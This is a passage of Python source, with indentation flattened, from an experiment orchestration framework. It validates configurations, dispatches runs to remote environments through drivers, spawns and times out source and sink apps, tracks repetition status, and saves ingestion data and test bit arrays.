for app_k, app_v in self.config.ENVIRONMENTS[env_k].APPS.items():
if app_v.zone not in self.environments[env_k]:
msg = "zone {z!r} of app {a!r} not available for env {e!r}".format(
                        z=app_v.zone, a=app_k, e=env_k
)
self.logger.critical(msg)
raise MisconfiguredError(msg)
# check if runs are digested
if any(not run.digested for run in leaves(self.phases)):
msg = "some experiment runs were not digested"
self.logger.critical(msg)
raise ExperimentRuntimeError(msg)
# check if drivers are created
if self.drivers:
for driver in leaves(self.drivers):
try:
driver.disconnect()
except (AssertionError, RuntimeError):
pass
self.drivers = self._create_drivers()
# Connection check only necessary for actual environment
if not all(_.can_connect() for _ in leaves(self.drivers[env])):
msg = "at least one driver cannot connect"
self.logger.critical(msg)
raise MisconfiguredError(msg)
@property
def execution_status(self) -> dict:
"""Gets the experiment execution status
The execution status has the following form:
{
<phase_key>: {
<run_key>: [
(<env name 1>, [True, True, ..., False]),
(<env name 2>, [True, True, ..., False]),
...
],
...
},
...
}
Returns:
dict: A dict with a structure like `phases`, with lists as leaves, containing
tuples (env, [executed runs]).
"""
return map_to_leaves(
lambda run: [
(env, list(v.values()))
# for env, v in run.infer_execution_status(update=update_runs).items()
for env, v in run.execution_status.items()
],
self.phases,
_seq=False,
)
    def infer_execution_status(self) -> None:
        """Infers the execution status from the contained Runs

        Delegates to each contained Run's `infer_execution_status`, which updates
        the Runs in place.
        """
        for phase in self.phases.values():
            for run in phase.values():
                run.infer_execution_status()
def _modify_execution_status(
self, env: str, query: t.Union[str, tuple], value: bool, *, push: bool = False
) -> None:
"""Modifies the execution status of experiment's phases and runs
Args:
env (str): The environment
query (t.Union[str, tuple]): The query to `getitem`
value (bool): The value to set
push (bool, optional): Push to runs?
"""
query_result = getitem(self.execution_status, query)
index_of_env = query_result.index(next(_ for _ in query_result if _[0] == env))
setitem(self.execution_status, query + (index_of_env,), (env, value))
if push:
self._push_execution_status()
def _push_execution_status(self) -> None:
"""Pushes execution status to experiment's runs
"""
for stats, run in zip(leaves(self.execution_status), leaves(self.phases)):
for env, rep_stats in stats:
run._execution_status[env] = {i: v for i, v in enumerate(rep_stats)}
def execute_in_environment(
self, env: str, phases: t.List[str], resume: bool = False
) -> None:
"""Executes the experiment in a specific environment
Args:
env (str): The environment
phases (t.List[str]): The phases to execute
resume (bool, optional): Resume execution?
Returns:
None: If no phases are executed
Raises:
ExperimentAbortedError: Interrupted by the user or options are mismatched
ExperimentRuntimeError: Failed to send or timed out
TypeError: Wrong type supplied to 'phases'
ValueError: Any of the provided phases were not available
"""
if resume and not getattr(self, "_update_mode", False):
self.logger.critical(
"'resume' should only be used if the 'experiment_exists_action' is 'update'"
)
proceed = prompt(
f"Do you want to continue resuming execution in env: {env!r} "
"with experiment action 'overwrite'"
)
if not proceed:
raise ExperimentAbortedError("Aborted due to 'resume' settings.")
if not isinstance(phases, t.List):
raise TypeError(f"'phases' must be a list, got: {type(phases)}")
invalid_phases = [_ for _ in phases if _ not in self.phases]
if invalid_phases:
raise ValueError(f"some/all of provided phases not available: {invalid_phases}")
self._validate_execute(env)
phases_to_execute = {
phase: values for phase, values in self.phases.items() if phase in phases
}
if not phases_to_execute:
self.logger.warning(f"no phases specified ({phases!r}), exiting")
return None
runs = (
# If resuming, pick runs that have at least one rep that has not been executed...
(
run
for run in leaves(phases_to_execute)
if not all(list(run.execution_status[env].values()))
)
if resume
# Otherwise, pick all runs.
else leaves(phases_to_execute)
)
bootstrapping_driver = None
_general = self.environment_config_general(env)
try:
for run in runs:
self.logger.info(f"executing phases: {phases!r} in env {env!r}")
if True:
# try:
run.send(env)
run.env_path(env).mkdir(parents=True, exist_ok=True)
run.drivers_proxy = self.drivers[env]
for zone, driver in self.drivers[env].items():
driver.mkdir(str(run.remote_env_path(env, zone)), parents=True)
if not bootstrapping_driver:
bootstrapping_driver = (zone, driver)
self.logger.info(f"{env}->{zone}: configuring to {_general}")
driver.setstate(**_general)
_ = driver.getstate()
self.logger.debug(f"{env}->{zone}: current state: {_}")
run.execute(env, resume=resume)
run.fetch_and_cleanup(env)
# except (KeyboardInterrupt, SystemExit) as e:
# raise
# except Exception as e:
# self.logger.critical(f"{env}: exception: {e} in run {run}")
except (KeyboardInterrupt, SystemExit) as e:
self.logger.critical(f"{env}: execution interrupted: {type(e)}")
raise
finally:
for zone, driver in self.drivers[env].items():
if not driver.backend.connected:
driver.backend.connect()
if (zone, driver) == bootstrapping_driver:
self.logger.info(f"{env}->{zone}: cleaning up")
# clean up explicitly before disconnecting to log/inspect state
driver.cleanup()
self.logger.debug(f"{env}->{zone}: cur. state: {driver.getstate()!r}")
delete_ok = driver.delete(path=str(self.remote_path(env, zone)), recursive=True)
self.logger.info(
f"{env}->{zone}: {'successfully' if delete_ok else 'failed to'} "
"deleted remote data directory"
)
driver.disconnect()
self.logger.info(f"{env}->{zone}: disconnected")
def execute(
self, *, env_phase_mapping: t.Optional[t.Dict[str, t.List[str]]] = None, resume=False
) -> None:
"""Execute the Experiment on a target platform
Preconditions:
- The experiment should be configured and bootstrapped.
- Drivers should be available and should be able to connect.
- Each run should be digested.
"""
if env_phase_mapping:
if not isinstance(env_phase_mapping, t.Dict):
raise TypeError("env_phase_mapping must be a dict")
for env, phases in env_phase_mapping.items():
if not isinstance(env, str) or env not in self.config.ENVIRONMENTS:
raise ValueError(f"invalid env in env_phase_mapping: {env}")
if not isinstance(phases, t.List):
raise TypeError(f"invalid value type in env_phase_mapping: {type(phases)}")
invalid_phases = [_ for _ in phases if _ not in self.phases]
if invalid_phases:
raise ValueError(f"invalid phases for env {env!r}: {invalid_phases}")
for env in self.config.ENVIRONMENTS:
self._validate_execute(env)
try:
phases = env_phase_mapping[env] if env_phase_mapping else list(self.phases)
self.execute_in_environment(env, phases=phases, resume=resume)
except (KeyboardInterrupt, SystemExit, Exception) as e:
exc = traceback.format_exception(type(e), e, e.__traceback__)
self.logger.critical(
f"execution failed for environment {env} with exception: {exc}"
)
raise ExperimentExecutionFailed(exc)
"""
Run
----------
Base class for experiment runs.
"""
class Run(
Pickleable,
Configurable,
HasParent,
IntermediatesHandler,
parent=Experiment,
metaclass=abc.ABCMeta,
):
def __init__(self, *args: t.Any, **kwargs: t.Any) -> None:
"""Initialise a Run
Args:
*args (t.Any): Passed to parent initialisers
**kwargs (t.Any): Passed to parent initialisers
Raises:
ExperimentRuntimeError: If not configured or doesn't have a parent
"""
Configurable.__init__(self, *args, **kwargs)
HasParent.__init__(self, *args, **kwargs)
if not self.configured or not self.parent:
raise ExperimentRuntimeError(
"Run instances are expected to be instantiated completely "
"with config and parent"
)
self.logger = self.parent.logger.getChild("Run")
self._runtime_config = dict()
if "repetitions" not in self.config:
raise ExperimentRuntimeError(
"All run instances and subclasses require a 'repetitions' config."
)
self._execution_status = {
env: {rep: False for rep in range(self.config.repetitions)}
for env in self.parent.config.ENVIRONMENTS
}
def _length_helper(self, length: t.Optional[int]) -> int:
"""Check if length type/value or get configured length
Args:
length (t.Optional[int]): The length
"""
pass
def _configure_layers_proxy(self, which: str, **kwargs) -> None:
"""Configure runtime-configurable layers
Layers are configured with own config (phase, length_seconds, frequency), and
optionally with values in kwargs. The layer keys must match (e.g. 'io', 'src')!
Since the config contains only the frequency, the bit rate is added too.
Args:
which (str): "encode" or "decode"
**kwargs: keyword arguments to pass to the parent Experiment configurator,
keys should correspond to layer names (e.g. 'lne', 'io')
"""
pass
@property
def execution_status(self) -> dict:
"""Gets the execution status of the Run
The Run's execution status has the form:
{
<env name>: {
<rep idx>: True | False,
...
},
...
}
Returns:
dict: The execution status
"""
return getattr(self, "_execution_status", self.infer_execution_status())
def infer_execution_status(self, *, update: bool = True) -> dict:
"""Infers the execution status from the contained files
Returns:
dict: The inferred execution status
Args:
update (bool, optional): Update the Run's own execution status?
Raises:
TypeError: Wrong type provided to 'update'
"""
if not isinstance(update, bool):
raise TypeError(f"'update' must be a {bool}, got: {type(update)}")
envs = list(self.parent.config.ENVIRONMENTS)
status = dict.fromkeys(envs)
for env in envs:
logs = self.env_path(env).glob("*/*.log.csv")
reps = sorted(set([log_path_unformatter(log)[1] for log in logs]))
total_reps = list(range(self.config.repetitions))
status[env] = {rep: (rep in reps) for rep in total_reps}
if update:
self._execution_status = status
return status
@property
def runtime_config(self) -> dict:
"""Get the last used runtime_config."""
return getattr(self, "_runtime_config", dict())
@runtime_config.setter
def runtime_config(self, value) -> None:
"""Set the rt config"""
if not isinstance(value, dict):
raise TypeError("'value' should be a dict-type", value)
setattr(self, "_runtime_config", cp.deepcopy(value))
def __repr__(self) -> str:
_ = ""
_ += "ingested, " if self.ingested else ""
_ += "digested, " if self.digested else ""
return f"<Run at {hex(id(self))} ({_}config={self.config})>"
@classmethod
def read(cls, path: Path, parent: t.Optional[object] = None) -> object:
"""Read a serialised Run and produce a Run instance
Args:
path (Path): The path of the serialised instance
parent (t.Optional[object], optional): The parent experiment to set
Returns:
object: The deserialised instance
"""
instance = cls.deserialise(path)
get_root_logger().debug(f"unpicked a run instance {instance}")
if parent:
instance.parent = parent
return instance
def _write_custom_schedules(self) -> t.List[Path]:
"""Write all custom schedules to the run path
Returns:
t.List[Path]: A list with copied schedules
Raises:
MisconfiguredError: If a provided file does not exist
"""
apps_with_schedules = {}
copied_schedules = []
for app in [v["APPS"] for v in self.parent.config.ENVIRONMENTS.values()]:
for k, v in {k: v for k, v in app.items() if "sched" in v}.items():
apps_with_schedules.update({k: v})
for app_name, app in apps_with_schedules.items():
sched_path = Path(app["sched"])
if not sched_path.exists():
raise MisconfiguredError(
f"The custom schedule file {sched_path} for app {app_name!r} does not exist!"
)
new_path = self.path / sched_path.name
copied_schedules.append(copy(sched_path, new_path, replace=True))
return copied_schedules
def write(self) -> None:
"""Serialise a Run instance"""
file_to_write = "_run.pickle"
path = Path.joinpath(self.path, file_to_write)
self.path.mkdir(parents=True, exist_ok=True)
self.serialise(path)
self.logger.debug(f"serialised run to '{path}'")
with (self.path / "_config.toml").open("w") as _:
toml.dump(self.config, _)
written_schedules = self._write_custom_schedules()
self.logger.debug(f"wrote custom schedules: {[str(_) for _ in written_schedules]}")
@property
@abc.abstractmethod
def identifier(self) -> str:
"""Get the save path"""
pass
@property
def path(self) -> Path:
formatted_directory = run_path_formatter(self.config.phase, self.identifier)
return Path.joinpath(self.parent.path, formatted_directory)
def env_path(self, env: str, *, relative: bool = False) -> Path:
"""Get a specific environment's path"""
assert isinstance(env, str)
assert env in self.parent.config.ENVIRONMENTS, "env in config.ENVIRONMENTS"
assert env in self.parent.environments, "env in environments"
if relative:
return (self.path / env).relative_to(self.parent.save_path)
else:
return self.path / env
def rep_path(self, env: str, rep: int, *, relative: bool = False) -> Path:
assert isinstance(rep, int), f"Wrong type for rep, should be int but is {type(rep)}"
assert (
rep < self.config.repetitions
), f"rep out of range, has to be small than {self.config.repetitions}"
return self.env_path(env, relative=relative).joinpath(repetition_formatter(rep))
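# Illustrative path composition (the actual directory names depend on run_path_formatter and
# repetition_formatter, which are not shown here):
# rep_path("env_a", 2) -> <experiment path>/<phase>_<identifier>/env_a/<rep 2 directory>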
def remote_path(self, env: str, zone: str) -> Path:
"""Get a remote path given an environment and a zone"""
assert isinstance(env, str)
assert isinstance(zone, str)
assert env in self.parent.config.ENVIRONMENTS, "env in config.ENVIRONMENTS"
assert env in self.parent.environments, "env in environments"
assert zone in self.parent.environments[env], "zone in env"
return self.parent.environments[env][zone].path_data / self.path.relative_to(
self.parent.save_path
)
def remote_env_path(self, env: str, zone: str) -> Path:
"""Get a remote environment path given an environment and an zone"""
return self.remote_path(env, zone) / env
def remote_rep_path(self, env: str, zone: str, rep: int) -> Path:
return self.remote_env_path(env, zone) / repetition_formatter(rep)
@property
def drivers_proxy(self) -> t.Mapping[str, Driver]:
"""Get a proxy to the Experiment's drivers for a specific environment
Returns:
t.Mapping[str, Driver]: A mapping: zone: str -> driver: Driver
"""
return getattr(self, "_drivers_proxy", {})
@drivers_proxy.setter
def drivers_proxy(self, value: t.Mapping[str, Driver]) -> None:
"""Set a proxy to the Experiment's drivers for a specific environment
Args:
value (t.Mapping[str, Driver]): A mapping: zone: str -> driver: Driver
"""
assert isinstance(value, t.Mapping), "must be a Mapping"
assert all(isinstance(_, Driver) for _ in value.values()), "must be Drivers"
self._drivers_proxy = value
@property
def ingested(self) -> bool:
"""Has the run performed all decoding steps?"""
return all(
_ is not None and len(_) > 0 for _ in self.i_streams.values()
)
def clear_ingest(self) -> None:
"""Has the run performed all decoding steps?"""
for stream in self.i_streams:
setattr(self, "i_" + stream, None)
@property
def path_ingestion_data(self) -> Path:
_filepath = self.path
for elem in self.ingestion_tag:
_filepath = _filepath / elem
return _filepath
def load_ingestion_data(
self, prefix: t.Optional[str] = "", bundled: bool = False, **kwargs
) -> None:
self.clear_ingest()
self._configure_layers_proxy("decode", **kwargs)
self.update_ingestion_tag()
self.intermediates = AttributeDict()
if bundled:
i_streams = self.load_mapping_bundled(
path=self.path_ingestion_data, prefix=prefix + "stream.i_"
)
else:
i_streams = self.load_mapping(
path=self.path_ingestion_data, prefix=prefix + "stream.i_"
)
for stream in i_streams:
setattr(self, "i_" + stream, i_streams[stream])
self.intermediates = self.load_mapping(
path=self.path_ingestion_data, prefix=prefix + "im_"
)
if not self.ingested:
raise Exception("Loading ingestion data failed due to missing data!")
def save_ingestion_data(self, prefix: t.Optional[str] = "", bundled: bool = False) -> None:
if self.ingested:
if bundled:
self.save_mapping_bundled(
"i_streams", path=self.path_ingestion_data, prefix=prefix + "stream.i_"
)
self.save_mapping_bundled(
"intermediates", path=self.path_ingestion_data, prefix=prefix + "im_"
)
else:
self.save_mapping(
"i_streams", path=self.path_ingestion_data, prefix=prefix + "stream.i_"
)
self.save_mapping(
"intermediates", path=self.path_ingestion_data, prefix=prefix + "im_"
)
else:
get_root_logger().warning("Run not ingested, nothing to be saved!")
def remove_ingestion_data(self, prefix: t.Optional[str] = "") -> None:
self.clear_ingest()
self.intermediates = AttributeDict()
self.remove_mapping(
"i_streams", path=self.path_ingestion_data, prefix=prefix + "stream.i_"
)
self.remove_mapping(
"intermediates", path=self.path_ingestion_data, prefix=prefix + "im_"
)
def update_ingestion_tag(self) -> None:
self.ingestion_tag = (
self.parent.layers.io.config.env,
repetition_formatter(self.parent.layers.io.config.rep),
)
@property
def ingestion_tag(self) -> tuple:
return getattr(self, "_ingestion_tag", ("", ""))
@ingestion_tag.setter
def ingestion_tag(self, value: tuple) -> None:
if isinstance(value, tuple):
self._ingestion_tag = value
else:
raise TypeError(f"Ingestion Tag has to be of type tuple, but is {type(value)}")
@property
def digested(self) -> bool:
"""Has the run performed all encoding steps?"""
return all(
_ is not None and len(_) > 0 for _ in self.o_streams.values()
)
@abc.abstractmethod
def digest(self, **kwargs) -> None:
"""Perform all encoding steps"""
pass
@abc.abstractmethod
def ingest(self, **kwargs) -> None:
"""Perform all decoding steps"""
pass
def make_random_bitarray(self, length: t.Optional[int] = None) -> bitarray:
"""Generate a random bit array of specified or configured length"""
return bitarray(self.make_random_boolarray(length).tolist())
def make_random_boolarray(self, length: t.Optional[int] = None) -> np.ndarray:
"""Generate a random bool NumPy array of specified or configured length"""
return np.random.randint(0, 2, self._length_helper(length), dtype=np.dtype("bool"))
def make_random_intarray(self, length: t.Optional[int] = None) -> np.ndarray:
"""Generate a random bool NumPy array of specified or configured length"""
return np.random.randint(0, 2, self._length_helper(length), dtype=np.dtype("int"))
def make_alternating_boolarray(self, length: t.Optional[int] = None) -> np.ndarray:
"""Generate an alternating NumPy bool array of specified or configured length"""
return np.resize([True, False], self._length_helper(length))
def make_alternating_intarray(self, length: t.Optional[int] = None) -> np.ndarray:
"""Generate an alternating binary NumPy int array of specified or configured length"""
return np.resize([1, 0], self._length_helper(length))
def make_alternating_bitarray(self, length: t.Optional[int] = None) -> bitarray:
"""Generate an alternating bit array of specified or configured length"""
return bitarray(self.make_alternating_boolarray(length).tolist())
def make_constant_boolarray(
self, value: bool, length: t.Optional[int] = None
) -> np.ndarray:
"""Generate an constant NumPy bool array of specified or configured length"""
assert isinstance(value, bool), "Value must be a boolean"
return np.resize([value], self._length_helper(length))
def make_constant_intarray(self, value: int, length: t.Optional[int] = None) -> np.ndarray:
"""Generate an constant binary NumPy int array of specified or configured length"""
assert isinstance(value, int) and value in [0, 1], "Value must be either 1 or 0"
return np.resize([value], self._length_helper(length))
def make_constant_bitarray(self, value: bool, length: t.Optional[int] = None) -> bitarray:
"""Generate an constant bit array of specified or configured length"""
return bitarray(self.make_constant_boolarray(value, length).tolist())
def make_repeated_intarray(
self, base: np.ndarray, length: t.Optional[int] = None
) -> np.ndarray:
"""Generate a NumPy int array of specified or configured length with a repeated pattern
Args:
base (np.ndarray): The base for the repeated pattern
length (t.Optional[int], optional): The length
Returns:
np.ndarray: The generated array
"""
return np.resize(base, self._length_helper(length))
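# Quick reference for the generator helpers above (np.resize repeats/truncates the base pattern;
# values shown assume _length_helper passes an explicit length straight through, which is an assumption):
# make_alternating_intarray(length=6)            -> array([1, 0, 1, 0, 1, 0])
# make_constant_intarray(1, length=6)            -> array([1, 1, 1, 1, 1, 1])
# make_repeated_intarray(np.array([1, 1, 0]), 6) -> array([1, 1, 0, 1, 1, 0])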
def _bootstrap_apps(self, env: str, rep: int) -> t.Mapping:
"""Bootstrap apps for the experiment
Args:
env (str): The environment name in which the app is to be executed
rep (int): The repetition number
Returns:
t.Mapping: A mapping with apps as keys, and values of:
- executable
- zone
- config
- runtime arguments
Raises:
ExperimentRuntimeError: If an application was not executable
"""
apps = self.parent.environments_apps_zones[env].copy()
for app in apps:
self.logger.debug(f"bootstrapping app {app!r} in env: {env!r}, run: {self}")
_e_z = "{}->{}".format(env, apps[app].zone)
_driver = self.drivers_proxy[apps[app].zone]
# Common values
sched = (
apps[app]["sched"]
if apps[app]["sched"] and app != "src"
else apps[app]["zone_config"]["schedule_tag"] + ".sched"
)
apps[app].sched = sched
apps[app].process = None
apps[app].duration = self.estimated_duration()
if apps[app].is_android:
apps[app].intent = None
# Standalone apps
if apps[app].standalone:
if not _driver.executable_exists(apps[app].executable):
raise ExperimentRuntimeError(
"{}: app {!r} standalone executable {!r} not valid".format(
_e_z, app, apps[app].executable
)
)
if apps[app].is_unix:
# Save stdout and stderr
apps[app].args += [
"1>{}".format(
str(
self.remote_rep_path(env, apps[app].zone, rep)
/ generic_log_formatter(app, dbg=False)
)
),
"2>{}".format(
str(
self.remote_rep_path(env, apps[app].zone, rep)
/ generic_log_formatter(app, dbg=True)
)
),
]
if apps[app].is_android and apps[app].app_config:
self.logger.debug(
"standalone android app has config, transforming into an Intent"
)
apps[app].intent = Intent(**apps[app].app_config.as_dict())
apps[app].intent.es.update(
{
"filename": str(
self.remote_path(env, apps[app].zone) / apps[app].sched
)
}
)
cfg = apps[app].app_config.as_dict()
filename = app_configfile_formatter(app)
with self.rep_path(env, rep).joinpath(filename).open("w") as file:
json.dump(cfg, file, indent=2)
self.logger.debug(f"bootstrapped standalone app {app!r}")
continue
# Framework apps
# On Unix, prepend the path to executables.
if apps[app].is_unix:
apps[app].executable = str(
Path(apps[app]["zone_config"]["path_apps"]) / apps[app].executable
)
if not _driver.executable_exists(apps[app].executable):
raise ExperimentRuntimeError(
"{}: app {!r} executable {!r} not available or executable on target".format(
_e_z, app, apps[app].executable
)
)
# These keys are needed by default. Will be added if not already present.
apps[app].app_config["meter"] = apps[app].app_config.get("meter", dict())
apps[app].app_config["logging"] = apps[app].app_config.get("logging", dict())
apps[app].app_config["schedule_reader"] = apps[app].app_config.get(
"schedule_reader", dict()
)
apps[app].app_config["meter"]["period"] = self.parent.environment_config_general(
env
).sampling_period
apps[app].app_config["logging"]["app_log_filename"] = str(
self.remote_rep_path(env, apps[app].zone, rep)
/ app_log_formatter(app, dbg=False)
)
apps[app].app_config["logging"]["debug_log_filename"] = str(
self.remote_rep_path(env, apps[app].zone, rep)
/ app_log_formatter(app, dbg=True)
)
if sched:
apps[app].app_config["schedule_reader"]["input_file"] = str(
self.remote_path(env, apps[app].zone) / sched
)
apps[app].app_config["schedule_reader"]["reading_from_file"] = True
else:
apps[app].app_config["schedule_reader"]["reading_from_file"] = False
self.logger.warning(f"App {app!r} does not have a schedule file?")
cfg = apps[app].app_config.as_dict()
filename = app_configfile_formatter(app)
with self.rep_path(env, rep).joinpath(filename).open("w") as file:
json.dump(cfg, file, indent=2)
apps[app].json = json.dumps(cfg)
apps[app].args = ["--json_string", json.dumps(cfg)]
self.logger.debug(f"bootstrapped local app {app!r}")
return apps
def execute(self, env: str, resume=False) -> None:
"""Execute a single Run in an environment
Args:
env (str): An environment name
resume (bool, optional): If True, only repetitions that have not yet been executed are run
"""
active_wait = (
True
if "active_wait" not in self.parent.environment_config_general(env)
else self.parent.environment_config_general(env).active_wait
)
# If resuming, pick repetitions that have not been executed
reps = [
rep
for rep, executed in self.execution_status[env].items()
if ((not executed) if resume else True)
]
self.logger.info(
f"executing in env: {env!r}, resume: {resume}, reps: {reps!r}, run: {self!r}"
)
for rep in reps:
self.rep_path(env, rep).mkdir(parents=True, exist_ok=True)
for zone, driver in self.drivers_proxy.items():
driver.mkdir(str(self.remote_rep_path(env, zone, rep)), parents=True)
self.logger.info(
f"executing in env: {env}, rep: {rep}, estimated duration: "
f"{self.estimated_duration()}s, run: {self!r}"
)
apps = self._bootstrap_apps(env, rep)
if not all(
[
"src" in apps,
"snk" in apps if "Exploratory" not in type(self).__name__ else True,
]
):
raise ExperimentRuntimeError("apps must at least have a 'src' and 'snk'")
master_processes = {zone: [] for zone in self.drivers_proxy}
slave_processes = {zone: [] for zone in self.drivers_proxy}
auxiliary_processes = {zone: [] for zone in self.drivers_proxy}
standalone_processes = {zone: [] for zone in self.drivers_proxy}
start_threads = []
barrier = threading.Barrier(1 + len(self.drivers_proxy))
try:
# 0. Init state
if "src" in apps:
self.drivers_proxy[apps["src"].zone].initstate()
else:
self.drivers_proxy[list(self.drivers_proxy)[0]].initstate()
# 1. Launch non-src apps with start_individually != True
for app in [
_
for _ in apps
if _ != "src" and not apps[_].get("start_individually", False)
]:
apps[app].process, _ = self.drivers_proxy[apps[app].zone].spawn(
apps[app].executable, apps[app].args, details=apps[app]
)
slave_processes[apps[app].zone].append(apps[app].process)
# NOTE specific to persistent
if apps[app].process.exited is not None:
self.logger.error(
f"{app!r} executable exited prematurely ({apps[app].process.exited}), stderr: {_.stderr}"
)
raise ExperimentRuntimeError(f"{app!r} executable exited prematurely")
else:
self.logger.debug(
f"spawned a {app!r} executable: {apps[app].process!r}"
)
# 2. Launch the src app and add other apps as slaves
apps["src"].process, _ = self.drivers_proxy[apps["src"].zone].spawn(
apps["src"].executable,
apps["src"].args,
slaves=slave_processes[apps["src"].zone],
details=apps["src"],
)
master_processes[apps["src"].zone].append(apps["src"].process)
if apps["src"].process.exited is not None:
self.logger.error(
f"'src' executable exited prematurely ({apps[app].process.exited}), stderr: {_.stderr}"
)
raise ExperimentRuntimeError(f"'src' executable exited prematurely")
else:
self.logger.debug(f"spawned a 'src' executable: {apps['src'].process!r}")
# 3. Delay between spawn & start
sleep_amount = (
1.0
if "delay_after_spawn" not in self.parent.environment_config_general(env)
else self.parent.environment_config_general(env).delay_after_spawn
)
self.logger.debug(f"sleeping after spawning regular apps for {sleep_amount}s")
sleep(sleep_amount)
# 4. Start auxiliary apps with start_individually == True
for app in [_ for _ in apps if apps[_].get("start_individually", False)]:
apps[app].process, _ = self.drivers_proxy[apps[app].zone].spawn(
apps[app].executable, apps[app].args, details=apps[app]
)
auxiliary_processes[apps[app].zone].append(apps[app].process)
if apps[app].process.exited is not None:
self.logger.error(
f"auxiliary executable {app!r} exited prematurely ({apps[app].process.exited}), "
f"stderr: {_.stderr}"
)
raise ExperimentRuntimeError(f"{app!r} executable exited prematurely")
else:
self.logger.debug(
f"spawned an auxiliary executable {app!r}, id: {apps[app].process!r}"
)
sleep_amount = (
1.0
if "delay_after_auxiliary"
not in self.parent.environment_config_general(env)
else self.parent.environment_config_general(env).delay_after_auxiliary
)
self.logger.debug(f"sleeping after spawning auxiliary apps for {sleep_amount}s")
sleep(sleep_amount)
# 5. Start apps
start_pgroup = {zone: [] for zone in self.drivers_proxy}
start_before_pgroup = {zone: [] for zone in self.drivers_proxy}
for zone in start_pgroup:
start_pgroup[zone] += slave_processes[zone] + master_processes[zone]
# filter out processes that are not meant to be started with the starter below
start_pgroup[zone] = [
_ for _ in start_pgroup[zone] if _ not in standalone_processes[zone]
]
start_before_pgroup[zone] = [
_ for _ in slave_processes[zone] if _ not in standalone_processes[zone]
]
stagger = (
self.parent.environment_config_general(env).stagger
if "stagger" in self.parent.environment_config_general(env)
else True
)
# Should start staggered?
if stagger:
def starter(_zone, _driver, _start_pgroup, _start_before_pgroup, _barrier):
self.logger.debug(f"waiting on barrier for zone {_zone}")
_barrier.wait()
if _start_before_pgroup:
_driver.start(*_start_before_pgroup)
if _start_pgroup:
_driver.start(*_start_pgroup)
for zone, driver in self.drivers_proxy.items():
self.logger.debug(
f"will start staggered in zone {zone!r}, "
f"first processes: {start_before_pgroup[zone]!r}, "
f"then processes: {master_processes[zone]!r}"
)
start_threads.append(
threading.Thread(
target=starter,
args=(
zone,
driver,
master_processes[zone],
start_before_pgroup[zone],
barrier,
),
)
)
else:
def starter(_zone, _driver, _processes, _barrier):
self.logger.debug(f"waiting on barrier for zone {_zone}")
_barrier.wait()
if _processes:
_driver.start(*_processes)
for zone, driver in self.drivers_proxy.items():
self.logger.debug(
f"will start simultaneously in zone {zone!r}, processes: {start_pgroup[zone]!r}"
)
start_threads.append(
threading.Thread(
target=starter, args=(zone, driver, start_pgroup[zone], barrier)
)
)
for thread in start_threads:
thread.start()
self.logger.debug(f"waiting on barrier for starting threads")
barrier.wait()
self.logger.debug(f"passed barrier for starting threads")
for thread in start_threads:
thread.join()
for zone in start_pgroup:
self.logger.debug(
f"started processes: {start_pgroup[zone]} in zone: {zone}"
)
if not active_wait:
for zone, driver in self.drivers_proxy.items():
self.logger.debug(f"disconnecting driver for zone {zone!r}")
driver.backend.disconnect()
# 6. Wait for SRC to complete
timeout_duration = (
10 * self.estimated_duration()
if "timeout_duration" not in self.parent.environment_config_general(env)
else self.parent.environment_config_general(env).timeout_duration
)
timeout_duration = max(timeout_duration, 3.0)
sleep_wait_for_src = max(1.5 * self.estimated_duration(), 1.0)
with Timeout(timeout_duration, throwing=False) as timeout:
# Inactive wait:
if not active_wait:
total_waited = 0.0
while True:
sleep(sleep_wait_for_src)
for zone, driver in self.drivers_proxy.items():
if not driver.backend.connected:
self.logger.debug(f"reconnecting driver for zone {zone!r}")
driver.backend.connect()
if apps["src"].process.exited is not None:
break
else:
total_waited += sleep_wait_for_src
self.logger.debug(
f"src app did not exit after {total_waited} sleep time "
f"in zone {zone!r}"
)
sleep_wait_for_src = max(0.5 * sleep_wait_for_src, 0.1 * self.estimated_duration())
else:
# Active wait:
self.drivers_proxy[apps["src"].zone].wait(
apps["src"].process,
refresh_period=max(0.275 * self.estimated_duration(), 1.0),
)
# 7. Check exit status of 'src' app, stop & kill.
if timeout.timed_out or apps["src"].process.exited is None:
self.logger.error(
f"'src' executable timed out after {timeout_duration} seconds, "
"will be terminated"
if timeout.timed_out
else f"'src' executable failed or timed out"
)
# Stop, then kill the 'src' app.
self.drivers_proxy[apps["src"].zone].stop(apps["src"].process)
sleep(0.25)
self.drivers_proxy[apps["src"].zone].kill(apps["src"].process)
if apps["src"].process.exited != 0:
self.logger.error(
f"'src' executable exited with non-zero return code "
f"({apps['src'].process.exited!r})"
)
else:
self.logger.debug("'src' executable exited successfully!")
# 8. Check exit statuses and explicitly kill apps
for app in [_ for _ in apps if _ != "src"]:
self.drivers_proxy[apps[app].zone].stop(apps[app].process)
sleep(0.25)
if apps[app].process.exited != 0:
self.logger.error(
f"app {app!r} executable exited with non-zero return code "
f"({apps[app].process.exited!r})"
)
else:
self.logger.debug(f"{app!r} executable exited successfully!")
break
if apps[app].process.exited is None:
self.logger.warning(f"app {app!r} did not exit gracefully!")
# 9. Update execution state for rep to True if no exception was fired
self._execution_status[env][rep] = True
except (KeyboardInterrupt, SystemExit):
self.logger.critical(f"interrupted repetition {rep} in env: {env!r}")
raise
except ExperimentRuntimeError as e:
self.logger.error(f"runtime error in repetition {rep} in env: {env!r}: {e}")
continue
finally:
# 10. Kill all processes
self.logger.debug("shutting down any remaining apps")
for zone, driver in self.drivers_proxy.items():
all_processes = [
*master_processes[zone],
*slave_processes[zone],
*auxiliary_processes[zone],
]
self.logger.debug(f"killing all_processes: {all_processes!r}")
driver.kill(*all_processes)
def send(self, env):
previous_id = None
previous_wd = None
for zone, driver in self.parent.drivers[env].items():
# if drivers connect to zones that have the same IP/serial address, the next driver
# must force connection, because the first driver to connect will lock the platform...
current_id = driver.connection_id
if not driver.connected:
driver.connect(force=current_id == previous_id) # gets original settings
current_wd = driver.working_directory
self.parent.logger.info(f"{env}->{zone}: connected: {driver.__class__.__name__}")
self.parent.logger.debug(
f"{env}->{zone}: original state: {driver.original_state!r}"
)
self.parent.logger.debug(
f"{env}->{zone}: curr_id: {current_id}, prev_id: {previous_id}"
)
self.parent.logger.debug(
f"{env}->{zone}: curr_wd: {current_wd}, prev_wd: {previous_wd}"
)
if current_id == previous_id and current_wd == previous_wd:
self.parent.logger.debug(
f"{env}->{zone}: experiment already sent, ids and working directories were "
f"the same in the previous driver ({previous_id}->{previous_wd!r})"
)
else:
self.parent.logger.info(f"{env}->{zone}: sending experiment")
if driver.exists(str(self.parent.remote_path(env, zone))):
self.parent.logger.debug(
f"{env}->{zone}: remote experiment directory exists, will be deleted"
)
_ = driver.delete(str(self.parent.remote_path(env, zone)), recursive=True)
if _:
self.parent.logger.debug(
